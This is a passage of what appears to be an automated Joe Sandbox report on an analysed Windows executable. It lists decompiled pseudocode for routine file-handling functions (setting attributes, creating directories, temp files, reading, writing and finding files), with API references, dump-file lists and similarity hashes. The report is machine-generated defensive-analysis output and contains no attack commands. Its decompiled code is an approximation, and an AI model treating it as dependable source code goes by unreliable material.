                                          0x004027df
                                          0x004027e9
                                          0x004027ee
                                          0x004027ef
                                          0x004027ce
                                          0x004027f7
                                          0x00402802
                                          0x0040280a

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: 01677122db5f9a9dc92e0e68fc714b810c240e95920f6c7928f993aadc845804
                                          • Instruction ID: 116dfd3529ede02fc162d870fedee277598c738aed7d6567ac0ffa60a71ea666
                                          • Opcode Fuzzy Hash: 01677122db5f9a9dc92e0e68fc714b810c240e95920f6c7928f993aadc845804
                                          • Instruction Fuzzy Hash: BCF04F719005069BDB15EB9AC892AEFBBB5FF80308F00403FE142775E2CA787985DB84
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004048B7 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E004048B7(WCHAR* __ecx, long __edx) {
				char _v16;
				void* __ebp;
				signed int _t5;
				void* _t9;

				if( *0x423148 != 0) {
					_t5 = SetFileAttributesW(__ecx, __edx); // executed
					return _t5 & 0xffffff00 | _t5 != 0x00000000;
				}
				_t9 = E0040489C( *((intOrPtr*)(E004048FF( &_v16, __ecx))), __edx);
				E00403A9C(_v16);
				return _t9;
			}







                                          0x004048c7
                                          0x004048f1
                                          0x00000000
                                          0x004048f9
                                          0x004048da
                                          0x004048e4
                                          0x00000000

                                          APIs
                                          • SetFileAttributesW.KERNELBASE ref: 004048F1
                                            • Part of subcall function 004048FF: __EH_prolog.LIBCMT ref: 00404904
                                            • Part of subcall function 004048FF: AreFileApisANSI.KERNEL32(?,?,?,?,?,00000000), ref: 00404920
                                            • Part of subcall function 0040489C: SetFileAttributesA.KERNELBASE(?,00000000,00404D1C,?,00000000,0000002A,0000005C,00000003,?,00000000), ref: 0040489E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: File$Attributes$ApisH_prolog
                                          • String ID:
                                          • API String ID: 3885834519-0
                                          • Opcode ID: 5b715810b1dd674a34631cbecd8c08cc0b37525bd29b6e223b4e60d05e4c896b
                                          • Instruction ID: d8abee0b5bf8aaacd3c7805e8248c04f8c14d25ec22198af343fb12e16f398c4
                                          • Opcode Fuzzy Hash: 5b715810b1dd674a34631cbecd8c08cc0b37525bd29b6e223b4e60d05e4c896b
                                          • Instruction Fuzzy Hash: 76E02B66F002502BC7103BA5AC065DB3B9D9B81314B20C43BA602A3291E9388E44A258
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040499C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0040499C(WCHAR* __ecx) {
				char _v16;
				void* __ebp;
				signed int _t5;
				void* _t8;

				if( *0x423148 != 0) {
					_t5 = CreateDirectoryW(__ecx, 0); // executed
					return _t5 & 0xffffff00 | _t5 != 0x00000000;
				} else {
					_t8 = E0040498D( *((intOrPtr*)(E004048FF( &_v16, __ecx))));
					E00403A9C(_v16);
					return _t8;
				}
			}







                                          0x004049a9
                                          0x004049d0
                                          0x004049dc
                                          0x004049ab
                                          0x004049b8
                                          0x004049c2
                                          0x004049cc
                                          0x004049cc

                                          APIs
                                          • CreateDirectoryW.KERNELBASE(?,00000000,?,?,00000000), ref: 004049D0
                                            • Part of subcall function 004048FF: __EH_prolog.LIBCMT ref: 00404904
                                            • Part of subcall function 004048FF: AreFileApisANSI.KERNEL32(?,?,?,?,?,00000000), ref: 00404920
                                            • Part of subcall function 0040498D: CreateDirectoryA.KERNELBASE(?,00000000,00405228,?,?,?,?,00000003,?,00000000,?,00000000), ref: 00404990
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CreateDirectory$ApisFileH_prolog
                                          • String ID:
                                          • API String ID: 1021588753-0
                                          • Opcode ID: 64b02790250bc5f7a2d9c9dee2bb0ba3baf7154ac0717740dd27b10109941aca
                                          • Instruction ID: 2f64d7a75cdf7ff6db5ed191fdbb19fa086d8aebc57dacf92a4c812467fb8a6f
                                          • Opcode Fuzzy Hash: 64b02790250bc5f7a2d9c9dee2bb0ba3baf7154ac0717740dd27b10109941aca
                                          • Instruction Fuzzy Hash: 18E0DFA0B002002BCB147B79AC0679E376D4B80218F10867EA652671E1EA7999449608
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004050AB Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E004050AB(CHAR* __ecx, CHAR* __edx, CHAR** _a4) {
				int _t4;
				CHAR* _t8;
				CHAR* _t13;
				CHAR** _t15;

				_t15 = _a4;
				_t13 = __edx;
				_t8 = __ecx;
				if(_t15[2] <= 0x105) {
					E0040243E(_t15, 0x105);
				}
				_t4 = GetTempFileNameA(_t8, _t13, 0,  *_t15); // executed
				E00404296(_t15);
				return _t4;
			}







                                          0x004050ad
                                          0x004050b7
                                          0x004050bc
                                          0x004050be
                                          0x004050c3
                                          0x004050c3
                                          0x004050ce
                                          0x004050d8
                                          0x004050e2

                                          APIs
                                          • GetTempFileNameA.KERNELBASE(?,?,00000000,00000003,?,?,00000000,004050FF,?,?,?,00405160,?,?,?,00000003), ref: 004050CE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: FileNameTemp
                                          • String ID:
                                          • API String ID: 745986568-0
                                          • Opcode ID: b528cc7740eeb1b4bc26185d4807bc948aa73c1e47f21f7391ebf62f515a6cd3
                                          • Instruction ID: d5c13e583cf4c34c7a3a11816bb62f42e40da82da4d3cfe63a6d47b8b5213b5b
                                          • Opcode Fuzzy Hash: b528cc7740eeb1b4bc26185d4807bc948aa73c1e47f21f7391ebf62f515a6cd3
                                          • Instruction Fuzzy Hash: 91E086723016106BD71056699C45A4BA7DEDFD8752F15843FB545E3381D6B48C004A78
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004058CD Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 84%
                                          			E004058CD(void* __ecx, void* __edx, void* __eflags) {
				void* _t10;
				void* _t25;

				E00413954(E00419718, _t25);
				E00404D51(_t25 - 0x44);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_push(__ecx);
				_t10 = E00405806(_t25 - 0x44, __edx); // executed
				E00403A9C( *((intOrPtr*)(_t25 - 0x1c)));
				 *[fs:0x0] =  *((intOrPtr*)(_t25 - 0xc));
				return _t10;
			}





                                          0x004058d2
                                          0x004058e1
                                          0x004058e6
                                          0x004058ea
                                          0x004058ee
                                          0x004058f8
                                          0x00405905
                                          0x0040590d

                                          APIs
                                          • __EH_prolog.LIBCMT ref: 004058D2
                                            • Part of subcall function 00405806: __EH_prolog.LIBCMT ref: 0040580B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: 4dbd7d17023fb4ed967e01381c8a8867ec9f7b58b557c0ee91cef2e13e81d9e3
                                          • Instruction ID: 5bfd618a99589873673dbdde5608ad138896477ef474a485a6b18cf586c7d2b5
                                          • Opcode Fuzzy Hash: 4dbd7d17023fb4ed967e01381c8a8867ec9f7b58b557c0ee91cef2e13e81d9e3
                                          • Instruction Fuzzy Hash: E7E01A72D410049ACB05BB95E9526EDB778EF51319F10403BA412725919B785E18CA58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405C87 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 86%
                                          			E00405C87(void** __ecx, void* _a4, long _a8, intOrPtr* _a12) {
				long _v8;
				long _t12;
				signed int _t14;
				void** _t16;

				_t16 = __ecx;
				_push(__ecx);
				_t12 =  *0x42045c; // 0x400000
				if(_a8 > _t12) {
					_a8 = _t12;
				}
				_v8 = _v8 & 0x00000000;
				_t14 = WriteFile( *_t16, _a4, _a8,  &_v8, 0); // executed
				 *_a12 = _v8;
				return _t14 & 0xffffff00 | _t14 != 0x00000000;
			}







                                          0x00405c87
                                          0x00405c8a
                                          0x00405c8b
                                          0x00405c93
                                          0x00405c95
                                          0x00405c95
                                          0x00405c9e
                                          0x00405caa
                                          0x00405cb8
                                          0x00405cbe

                                          APIs
                                          • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00405CAA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: FileWrite
                                          • String ID:
                                          • API String ID: 3934441357-0
                                          • Opcode ID: e8bb3e3f97a2863afff16af0127552a93838812ee23e56086e0288621279a6ee
                                          • Instruction ID: 646c0e8b7f70081892c45aa98fa77e415187d9694f298a279afc83584de54578
                                          • Opcode Fuzzy Hash: e8bb3e3f97a2863afff16af0127552a93838812ee23e56086e0288621279a6ee
                                          • Instruction Fuzzy Hash: F8E0E575600208FFCB11CF95C801B8E7BF9EB09364F20C069F914AA260D339EA50DF54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004057CF Relevance: 1.5, APIs: 1, Instructions: 19fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E004057CF(void** __ecx, intOrPtr _a4) {
				struct _WIN32_FIND_DATAA _v324;
				int _t7;
				signed int _t10;
				signed int _t11;

				_t7 = FindNextFileA( *__ecx,  &_v324); // executed
				_t11 = _t10 & 0xffffff00 | _t7 != 0x00000000;
				_t16 = _t11;
				if(_t11 != 0) {
					E0040557F( &_v324, _a4, _t16);
				}
				return _t11;
			}







                                          0x004057e2
                                          0x004057ea
                                          0x004057ed
                                          0x004057ef
                                          0x004057fa
                                          0x004057fa
                                          0x00405803

                                          APIs
                                          • FindNextFileA.KERNELBASE(000000FF,?,00000000), ref: 004057E2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: FileFindNext
                                          • String ID:
                                          • API String ID: 2029273394-0
                                          • Opcode ID: 3f971b6e9297c3c0785ec7bffefe866e244883e864d52b31c5d14701259a415c
                                          • Instruction ID: a758ab2b17ce6f49d488120cb08fd5c978c50398f8c9baf96463bb2a7ddcf629
                                          • Opcode Fuzzy Hash: 3f971b6e9297c3c0785ec7bffefe866e244883e864d52b31c5d14701259a415c
                                          • Instruction Fuzzy Hash: 7CD0C231140009ABC711EB21DC41EEA33ADEB04348F144075AA495B1B0EA319D489F54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405841 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 86%
                                          			E00405841(void* __ecx, void* __edx) {
				void* _t11;
				void* _t22;

				E00413954(E004196F0, _t22);
				_push(__ecx);
				 *(_t22 - 0x10) =  *(_t22 - 0x10) | 0xffffffff;
				_t3 = _t22 - 4;
				 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
				_t11 = E004055DE(_t22 - 0x10,  *_t3,  *((intOrPtr*)(_t22 + 8)), __ecx); // executed
				E0040551A(_t22 - 0x10);
				 *[fs:0x0] =  *((intOrPtr*)(_t22 - 0xc));
				return _t11;
			}





                                          0x00405846
                                          0x0040584b
                                          0x0040584c
                                          0x00405851
                                          0x00405851
                                          0x0040585c
                                          0x00405866
                                          0x00405871
                                          0x00405879

                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00405846
                                            • Part of subcall function 004055DE: __EH_prolog.LIBCMT ref: 004055E3
                                            • Part of subcall function 004055DE: FindFirstFileW.KERNELBASE(?,?), ref: 00405611
                                            • Part of subcall function 0040551A: FindClose.KERNELBASE(?,000000FF,0040554B,000000FF), ref: 00405525
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: FindH_prolog$CloseFileFirst
                                          • String ID:
                                          • API String ID: 2004497850-0
                                          • Opcode ID: 220b4cbfc40620496b03372d3826f196b8ab05123004ed9f75f8387d5271fe3c
                                          • Instruction ID: b7fde63f1f0c292b4e5d00ec8c3d5d27a79480d2707f186765d0e2b5b752fd38
                                          • Opcode Fuzzy Hash: 220b4cbfc40620496b03372d3826f196b8ab05123004ed9f75f8387d5271fe3c
                                          • Instruction Fuzzy Hash: 7CE04FB1951506ABCB14DF50CC52AEEB734FB1131CF10421EE021722D08B785648CA28
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405806 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 86%
                                          			E00405806(void* __ecx, void* __edx) {
				void* _t11;
				void* _t22;

				E00413954(E004196DC, _t22);
				_push(__ecx);
				 *(_t22 - 0x10) =  *(_t22 - 0x10) | 0xffffffff;
				_t3 = _t22 - 4;
				 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
				_t11 = E0040553A(_t22 - 0x10,  *_t3,  *((intOrPtr*)(_t22 + 8)), __ecx); // executed
				E0040551A(_t22 - 0x10);
				 *[fs:0x0] =  *((intOrPtr*)(_t22 - 0xc));
				return _t11;
			}





                                          0x0040580b
                                          0x00405810
                                          0x00405811
                                          0x00405816
                                          0x00405816
                                          0x00405821
                                          0x0040582b
                                          0x00405836
                                          0x0040583e

                                          APIs
                                          • __EH_prolog.LIBCMT ref: 0040580B
                                            • Part of subcall function 0040553A: FindFirstFileA.KERNELBASE(?,?,000000FF), ref: 00405559
                                            • Part of subcall function 0040551A: FindClose.KERNELBASE(?,000000FF,0040554B,000000FF), ref: 00405525
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Find$CloseFileFirstH_prolog
                                          • String ID:
                                          • API String ID: 889498515-0
                                          • Opcode ID: bc6002362a3e3570d7b7dbbff413248cb0e6e96336b5f812f3c621cb83c14948
                                          • Instruction ID: 15a52a3ac40e1f9f01e416ae3406c700f8aec04b6379e90cb97043f6baa550c5
                                          • Opcode Fuzzy Hash: bc6002362a3e3570d7b7dbbff413248cb0e6e96336b5f812f3c621cb83c14948
                                          • Instruction Fuzzy Hash: 2AE01AB195150AAACB04DB50CC52AEEB760EB1131CF00421AA421722D0877856488A28
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040F8C3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E0040F8C3(intOrPtr* __ecx, void* __eflags) {
				void* _t8;
				void* _t17;
				intOrPtr _t19;

				E00413954(E0041A808, _t17);
				_push(__ecx);
				 *(_t17 - 4) =  *(_t17 - 4) & 0x00000000;
				 *((intOrPtr*)(_t17 - 0x10)) = _t19;
				_t8 = E0040F648(__ecx, __eflags,  *((intOrPtr*)(_t17 + 8))); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t17 - 0xc));
				return _t8;
			}






                                          0x0040f8c8
                                          0x0040f8cd
                                          0x0040f8ce
                                          0x0040f8d5
                                          0x0040f8db
                                          0x0040f8f0
                                          0x0040f8f9

                                          APIs
                                          • __EH_prolog.LIBCMT ref: 0040F8C8
                                            • Part of subcall function 0040F648: __EH_prolog.LIBCMT ref: 0040F64D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: fd9f4e5796ff426001010c6032b0bd2709108ec26b7ef45d9eef3846ac2bdd07
                                          • Instruction ID: 6b40bdca6a02cd8c303c1b1c800ac92429027f894e9b325ac65d5e69f4ab0667
                                          • Opcode Fuzzy Hash: fd9f4e5796ff426001010c6032b0bd2709108ec26b7ef45d9eef3846ac2bdd07
                                          • Instruction Fuzzy Hash: 0CD01272911104EBD711AB49D842BDEBB68EB8135DF10853BF00171550C37D56459569
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405B7B Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 75%
                                          			E00405B7B(void** __ecx, void* _a4, long _a8, intOrPtr* _a12) {
				long _v8;
				signed int _t11;

				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t11 = ReadFile( *__ecx, _a4, _a8,  &_v8, 0); // executed
				 *_a12 = _v8;
				return _t11 & 0xffffff00 | _t11 != 0x00000000;
			}





                                          0x00405b7e
                                          0x00405b85
                                          0x00405b91
                                          0x00405b9f
                                          0x00405ba5

                                          APIs
                                          • ReadFile.KERNELBASE(000000FF,00000000,?,?,00000000,000000FF,?,00405BC6,00000000,?,00000000,?,00405BEC,00000000,?,00000000), ref: 00405B91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: a0fa365660526cfbb9cae47ffd537a5a3e67cffdb1018a760807b9850e2f108c
                                          • Instruction ID: c5e24743f6b433bb21cc94cc2971fe47eb8403274bd7f90fdb54931116458873
                                          • Opcode Fuzzy Hash: a0fa365660526cfbb9cae47ffd537a5a3e67cffdb1018a760807b9850e2f108c
                                          • Instruction Fuzzy Hash: 7EE0EC75241208FBCB01CF90CD01FCE7BB9EB49754F208058E90596160D375AA14EB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040551A Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0040551A(void** __ecx) {
				void* _t1;
				int _t3;
				signed int* _t6;

				_t6 = __ecx;
				_t1 =  *__ecx;
				if(_t1 == 0xffffffff) {
					L4:
					return 1;
				} else {
					_t3 = FindClose(_t1); // executed
					if(_t3 != 0) {
						 *_t6 =  *_t6 | 0xffffffff;
						goto L4;
					} else {
						return 0;
					}
				}
			}






                                          0x0040551b
                                          0x0040551d
                                          0x00405522
                                          0x00405536
                                          0x00405539
                                          0x00405524
                                          0x00405525
                                          0x0040552d
                                          0x00405533
                                          0x00000000
                                          0x0040552f
                                          0x00405532
                                          0x00405532
                                          0x0040552d

                                          APIs
                                          • FindClose.KERNELBASE(?,000000FF,0040554B,000000FF), ref: 00405525
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CloseFind
                                          • String ID:
                                          • API String ID: 1863332320-0
                                          • Opcode ID: a5f15e60ddec85d8ac06024adb1482cc35c18756887bd61c03bc9ed0d5cb4483
                                          • Instruction ID: 986561ebb0227da743eeb2b9ec995cdcc659c9848a972ac8d271436d9e92df52
                                          • Opcode Fuzzy Hash: a5f15e60ddec85d8ac06024adb1482cc35c18756887bd61c03bc9ed0d5cb4483
                                          • Instruction Fuzzy Hash: 6BD0123150452166CF745E3C7C459C333D99A123B03660BAAF4B4D32E5D3748CC35AD4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405A63 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00405A63(void** __ecx) {
				void* _t1;
				int _t3;
				signed int* _t6;

				_t6 = __ecx;
				_t1 =  *__ecx;
				if(_t1 == 0xffffffff) {
					L4:
					return 1;
				} else {
					_t3 = FindCloseChangeNotification(_t1); // executed
					if(_t3 != 0) {
						 *_t6 =  *_t6 | 0xffffffff;
						goto L4;
					} else {
						return 0;
					}
				}
			}






                                          0x00405a64
                                          0x00405a66
                                          0x00405a6b
                                          0x00405a7f
                                          0x00405a82
                                          0x00405a6d
                                          0x00405a6e
                                          0x00405a76
                                          0x00405a7c
                                          0x00000000
                                          0x00405a78
                                          0x00405a7b
                                          0x00405a7b
                                          0x00405a76

                                          APIs
